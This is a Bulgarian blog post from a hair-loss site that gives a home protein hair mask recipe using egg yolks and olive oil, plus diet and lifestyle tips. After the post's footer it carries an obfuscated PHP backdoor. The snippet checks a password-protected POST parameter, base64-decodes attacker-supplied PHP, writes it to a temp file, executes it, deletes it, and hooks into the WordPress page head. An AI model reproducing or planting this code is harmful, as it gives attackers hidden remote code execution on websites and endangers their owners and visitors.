Как да направим увредената коса отново здрава и силна | Косопад

Как да направим увредената коса отново здрава и силна

Когато косата стане много суха и чуплива, може да се дължи на недостиг на протеини. Ето как да си ги набавите и да възстановите косата си:

recepta-s-proteini

Процедура с протеини ще прeдаде блясък на косата и ще подобри външността й. По този начин изглаждате кутикулата, което увеличава издръжливостта и не позволява косата да се наелектризира.

Косите, които са третирани с химикали, или които се оформят с горещи уреди, могат да минат процедурата с протеини. Ето някои идеи как да ги направите в домашни условия:

РЕЦЕПТА С ЯЙЦЕ

Яйцето е най- използваната съставка за протеиновите процедури.

За да направим маската, ни трябват:

1 или 2 жълтъка, в зависимост колко е дълга косата
2 с.л. зехтин

Ако косата ви е мазна, трябва да използвате само белтъците.

Нанася се върху измитата коса. Наблегнете на сухите краища и се покрийте с кърпа или шапка за баня. Оставете за 12 yaice-za-kosaминути и измийте. Процедурата се повтаря веднъж седмично в продължение на месец. После я правите веднъж месечно.

Трябва да отбележим, че някои коси не понасят протеина. Прекаляването с протеини може да направи косата твърда и без блясък. Започнете с малко и постепенно увеличавайте, за да сте сигурни, че ви понася.

ПРОТЕИН ЗА РАСТЕЖ НА КОСАТА

Включването на достатъчно протеини в храненето ви, също помага на косата да расте по- бързо и да е по- здрава. Богати източници на протеини са рибата, яйцата, киселото мляко, житния зародиш и тофу.

Освен това е важно да спите по 8 часа на ден, да тренирате и да намалите стреса.

Приема ма мултивитамини с достатъчно витамин В също ще помогне за здравето на косата ви.

20. февруари 2014 13:32:15 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}